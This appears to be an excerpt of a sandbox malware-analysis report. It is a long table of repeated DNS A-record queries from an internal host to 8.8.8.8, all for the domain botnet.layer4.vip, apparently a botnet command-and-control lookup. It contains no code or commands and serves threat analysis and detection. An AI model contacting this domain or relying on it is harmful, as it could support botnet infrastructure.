                                  Apr 9, 2023 03:32:22.805361986 CEST192.168.2.238.8.8.80x5feaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.830610991 CEST192.168.2.238.8.8.80x5feaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.856229067 CEST192.168.2.238.8.8.80x9dabStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.872740030 CEST192.168.2.238.8.8.80x9dabStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.896796942 CEST192.168.2.238.8.8.80x9dabStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.912662029 CEST192.168.2.238.8.8.80x9dabStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.929462910 CEST192.168.2.238.8.8.80x9dabStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.953623056 CEST192.168.2.238.8.8.80x895Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.969183922 CEST192.168.2.238.8.8.80x895Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.993244886 CEST192.168.2.238.8.8.80x895Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.009089947 CEST192.168.2.238.8.8.80x895Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.024980068 CEST192.168.2.238.8.8.80x895Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.040816069 CEST192.168.2.238.8.8.80x4b14Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.056293011 CEST192.168.2.238.8.8.80x4b14Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.071849108 CEST192.168.2.238.8.8.80x4b14Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.087622881 CEST192.168.2.238.8.8.80x4b14Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.111906052 CEST192.168.2.238.8.8.80x4b14Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.136015892 CEST192.168.2.238.8.8.80xd7c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.151838064 CEST192.168.2.238.8.8.80xd7c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.167777061 CEST192.168.2.238.8.8.80xd7c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.183342934 CEST192.168.2.238.8.8.80xd7c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.207370043 CEST192.168.2.238.8.8.80xd7c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.223062038 CEST192.168.2.238.8.8.80x3799Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.247370005 CEST192.168.2.238.8.8.80x3799Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.263108015 CEST192.168.2.238.8.8.80x3799Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.278892040 CEST192.168.2.238.8.8.80x3799Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.303082943 CEST192.168.2.238.8.8.80x3799Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.327436924 CEST192.168.2.238.8.8.80x8deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.351593971 CEST192.168.2.238.8.8.80x8deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.367162943 CEST192.168.2.238.8.8.80x8deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.391175032 CEST192.168.2.238.8.8.80x8deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.407093048 CEST192.168.2.238.8.8.80x8deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.423132896 CEST192.168.2.238.8.8.80xc8eeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.438709021 CEST192.168.2.238.8.8.80xc8eeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.454251051 CEST192.168.2.238.8.8.80xc8eeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.478657007 CEST192.168.2.238.8.8.80xc8eeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.503174067 CEST192.168.2.238.8.8.80xc8eeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.518924952 CEST192.168.2.238.8.8.80x9863Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.543247938 CEST192.168.2.238.8.8.80x9863Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.567653894 CEST192.168.2.238.8.8.80x9863Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.583183050 CEST192.168.2.238.8.8.80x9863Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.599016905 CEST192.168.2.238.8.8.80x9863Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.624119997 CEST192.168.2.238.8.8.80xe702Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.648293972 CEST192.168.2.238.8.8.80xe702Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.663727045 CEST192.168.2.238.8.8.80xe702Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.679186106 CEST192.168.2.238.8.8.80xe702Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.703207970 CEST192.168.2.238.8.8.80xe702Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.727699995 CEST192.168.2.238.8.8.80xef58Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.751679897 CEST192.168.2.238.8.8.80xef58Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.776242018 CEST192.168.2.238.8.8.80xef58Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.791975975 CEST192.168.2.238.8.8.80xef58Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.807683945 CEST192.168.2.238.8.8.80xef58Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.824533939 CEST192.168.2.238.8.8.80x1a29Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.840332985 CEST192.168.2.238.8.8.80x1a29Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.864754915 CEST192.168.2.238.8.8.80x1a29Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.880243063 CEST192.168.2.238.8.8.80x1a29Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.904638052 CEST192.168.2.238.8.8.80x1a29Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.928726912 CEST192.168.2.238.8.8.80x835aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.952903986 CEST192.168.2.238.8.8.80x835aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.977030993 CEST192.168.2.238.8.8.80x835aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.001126051 CEST192.168.2.238.8.8.80x835aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.025680065 CEST192.168.2.238.8.8.80x835aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.041606903 CEST192.168.2.238.8.8.80xbf21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.066072941 CEST192.168.2.238.8.8.80xbf21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.081520081 CEST192.168.2.238.8.8.80xbf21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.097192049 CEST192.168.2.238.8.8.80xbf21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.121767044 CEST192.168.2.238.8.8.80xbf21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.138799906 CEST192.168.2.238.8.8.80x3a65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.156322002 CEST192.168.2.238.8.8.80x3a65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.173296928 CEST192.168.2.238.8.8.80x3a65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.199394941 CEST192.168.2.238.8.8.80x3a65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.225322962 CEST192.168.2.238.8.8.80x3a65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.252626896 CEST192.168.2.238.8.8.80x2373Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.278829098 CEST192.168.2.238.8.8.80x2373Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.297226906 CEST192.168.2.238.8.8.80x2373Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.313028097 CEST192.168.2.238.8.8.80x2373Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.328592062 CEST192.168.2.238.8.8.80x2373Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.344340086 CEST192.168.2.238.8.8.80x32f8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.368937016 CEST192.168.2.238.8.8.80x32f8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.384922981 CEST192.168.2.238.8.8.80x32f8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.400964022 CEST192.168.2.238.8.8.80x32f8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.425180912 CEST192.168.2.238.8.8.80x32f8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.449270010 CEST192.168.2.238.8.8.80x108fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.464797974 CEST192.168.2.238.8.8.80x108fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.480827093 CEST192.168.2.238.8.8.80x108fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.505527020 CEST192.168.2.238.8.8.80x108fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.529908895 CEST192.168.2.238.8.8.80x108fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.554650068 CEST192.168.2.238.8.8.80xc625Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.570558071 CEST192.168.2.238.8.8.80xc625Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.587037086 CEST192.168.2.238.8.8.80xc625Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.611100912 CEST192.168.2.238.8.8.80xc625Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.635236979 CEST192.168.2.238.8.8.80xc625Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.659840107 CEST192.168.2.238.8.8.80x1a89Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.684408903 CEST192.168.2.238.8.8.80x1a89Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.700292110 CEST192.168.2.238.8.8.80x1a89Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.716161013 CEST192.168.2.238.8.8.80x1a89Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.731703997 CEST192.168.2.238.8.8.80x1a89Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.747384071 CEST192.168.2.238.8.8.80xdab2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.763349056 CEST192.168.2.238.8.8.80xdab2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.787725925 CEST192.168.2.238.8.8.80xdab2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.811780930 CEST192.168.2.238.8.8.80xdab2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.835889101 CEST192.168.2.238.8.8.80xdab2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.851492882 CEST192.168.2.238.8.8.80xe319Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.867311954 CEST192.168.2.238.8.8.80xe319Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.883022070 CEST192.168.2.238.8.8.80xe319Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.898569107 CEST192.168.2.238.8.8.80xe319Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.922943115 CEST192.168.2.238.8.8.80xe319Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.947352886 CEST192.168.2.238.8.8.80x4236Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.963690042 CEST192.168.2.238.8.8.80x4236Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.988387108 CEST192.168.2.238.8.8.80x4236Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.003865957 CEST192.168.2.238.8.8.80x4236Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.028295040 CEST192.168.2.238.8.8.80x4236Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.055044889 CEST192.168.2.238.8.8.80xa0a7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.070715904 CEST192.168.2.238.8.8.80xa0a7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.095829964 CEST192.168.2.238.8.8.80xa0a7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.120439053 CEST192.168.2.238.8.8.80xa0a7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.145188093 CEST192.168.2.238.8.8.80xa0a7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.160633087 CEST192.168.2.238.8.8.80xd14cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.184942007 CEST192.168.2.238.8.8.80xd14cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.211262941 CEST192.168.2.238.8.8.80xd14cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.228528023 CEST192.168.2.238.8.8.80xd14cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.245675087 CEST192.168.2.238.8.8.80xd14cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.270036936 CEST192.168.2.238.8.8.80x515eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.294364929 CEST192.168.2.238.8.8.80x515eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.310178041 CEST192.168.2.238.8.8.80x515eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.334216118 CEST192.168.2.238.8.8.80x515eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.358218908 CEST192.168.2.238.8.8.80x515eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.374156952 CEST192.168.2.238.8.8.80xd59eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.389991999 CEST192.168.2.238.8.8.80xd59eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.414303064 CEST192.168.2.238.8.8.80xd59eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.438815117 CEST192.168.2.238.8.8.80xd59eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.454417944 CEST192.168.2.238.8.8.80xd59eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.478610039 CEST192.168.2.238.8.8.80xc913Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.494612932 CEST192.168.2.238.8.8.80xc913Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.510623932 CEST192.168.2.238.8.8.80xc913Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.526197910 CEST192.168.2.238.8.8.80xc913Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.542054892 CEST192.168.2.238.8.8.80xc913Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.557972908 CEST192.168.2.238.8.8.80x83daStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.573312044 CEST192.168.2.238.8.8.80x83daStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.588716030 CEST192.168.2.238.8.8.80x83daStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.612819910 CEST192.168.2.238.8.8.80x83daStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.637191057 CEST192.168.2.238.8.8.80x83daStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.652925014 CEST192.168.2.238.8.8.80x6246Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.668519020 CEST192.168.2.238.8.8.80x6246Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.684590101 CEST192.168.2.238.8.8.80x6246Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.700098991 CEST192.168.2.238.8.8.80x6246Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.716022015 CEST192.168.2.238.8.8.80x6246Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.731544971 CEST192.168.2.238.8.8.80x20b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.755878925 CEST192.168.2.238.8.8.80x20b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.771821976 CEST192.168.2.238.8.8.80x20b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.796145916 CEST192.168.2.238.8.8.80x20b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.811971903 CEST192.168.2.238.8.8.80x20b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.827466011 CEST192.168.2.238.8.8.80x9f63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.851533890 CEST192.168.2.238.8.8.80x9f63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.876095057 CEST192.168.2.238.8.8.80x9f63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.891868114 CEST192.168.2.238.8.8.80x9f63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.907733917 CEST192.168.2.238.8.8.80x9f63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.923731089 CEST192.168.2.238.8.8.80xce63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.939254999 CEST192.168.2.238.8.8.80xce63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.963660955 CEST192.168.2.238.8.8.80xce63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.988154888 CEST192.168.2.238.8.8.80xce63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.004098892 CEST192.168.2.238.8.8.80xce63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.028534889 CEST192.168.2.238.8.8.80x524bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.044085979 CEST192.168.2.238.8.8.80x524bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.068130016 CEST192.168.2.238.8.8.80x524bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.092607975 CEST192.168.2.238.8.8.80x524bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.108479977 CEST192.168.2.238.8.8.80x524bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.132920980 CEST192.168.2.238.8.8.80x245eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.157309055 CEST192.168.2.238.8.8.80x245eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.173157930 CEST192.168.2.238.8.8.80x245eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.188971043 CEST192.168.2.238.8.8.80x245eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.204740047 CEST192.168.2.238.8.8.80x245eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.220284939 CEST192.168.2.238.8.8.80xbcd5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.244874001 CEST192.168.2.238.8.8.80xbcd5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.260678053 CEST192.168.2.238.8.8.80xbcd5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.276567936 CEST192.168.2.238.8.8.80xbcd5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.300755024 CEST192.168.2.238.8.8.80xbcd5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.325098038 CEST192.168.2.238.8.8.80x3b19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.340706110 CEST192.168.2.238.8.8.80x3b19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.356592894 CEST192.168.2.238.8.8.80x3b19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.380772114 CEST192.168.2.238.8.8.80x3b19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.405303955 CEST192.168.2.238.8.8.80x3b19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.429847956 CEST192.168.2.238.8.8.80xdfa9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.453980923 CEST192.168.2.238.8.8.80xdfa9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.469835997 CEST192.168.2.238.8.8.80xdfa9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.494311094 CEST192.168.2.238.8.8.80xdfa9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.518743992 CEST192.168.2.238.8.8.80xdfa9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.534435987 CEST192.168.2.238.8.8.80x5b21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.551891088 CEST192.168.2.238.8.8.80x5b21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.567693949 CEST192.168.2.238.8.8.80x5b21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.583431005 CEST192.168.2.238.8.8.80x5b21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.607383966 CEST192.168.2.238.8.8.80x5b21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.631792068 CEST192.168.2.238.8.8.80xfe97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.647681952 CEST192.168.2.238.8.8.80xfe97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.663615942 CEST192.168.2.238.8.8.80xfe97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.679363966 CEST192.168.2.238.8.8.80xfe97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.695020914 CEST192.168.2.238.8.8.80xfe97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.719208956 CEST192.168.2.238.8.8.80x9e4bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
